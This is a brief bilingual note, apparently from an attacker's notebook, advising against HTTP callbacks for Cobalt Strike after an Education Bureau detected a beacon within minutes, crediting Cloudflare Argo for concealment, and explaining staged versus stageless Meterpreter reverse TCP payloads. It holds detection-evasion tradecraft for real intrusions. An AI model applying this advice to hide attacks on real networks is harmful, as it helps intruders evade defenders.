Apt

绝对禁止在实战中使用HTTP协议

用cobaltstrike的HTTP上线，被教育局抓了，刚上线几分钟教育局就打来电话了。还好套了层cloudflare argo

meterpreter/reverse_tcp和meterpreter_reverse_tcp区别

payload/windows/x64/meterpreter/reverse_tcp                               normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager

payload/windows/x64/meterpreter_reverse_tcp                               normal  No     Windows Meterpreter Shell, Reverse TCP Inline x64

这两个的区别在于第一个是stage模式，第二个是stageless

Never Use HTTP Protocol in Actual Operations

Using Cobalt Strike’s HTTP for callback resulted in an immediate call from the Education Bureau within minutes of coming online. Luckily, a layer of Cloudflare Argo was used.

The Difference Between meterpreter/reverse_tcp and meterpreter_reverse_tcp

payload/windows/x64/meterpreter/reverse_tcp                               normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager

payload/windows/x64/meterpreter_reverse_tcp                               normal  No     Windows Meterpreter Shell, Reverse TCP Inline x64

The difference between these two is that the first one uses a staged payload (stage mode), while the second one is stageless.